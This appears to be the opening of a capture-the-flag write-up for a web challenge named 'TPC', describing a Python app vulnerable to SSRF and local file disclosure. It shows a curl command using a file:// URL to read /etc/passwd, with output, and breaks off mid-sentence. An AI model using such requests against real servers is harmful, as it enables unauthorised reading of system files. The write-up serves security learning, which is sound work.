TPC (web, 310p, 33 solves)

Description

The challenge implements a simple Python application that takes a URL as a parameter. It allows us to perform SSRF and local file disclosure.
Reading a file on the server is as simple as:
$ curl -s --output - 'http://220.127.116.11:8000/query?site=file:///etc/passwd'
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
[...]

We first needed to be sure what the Python code does. To find out, we tried to find where it was located: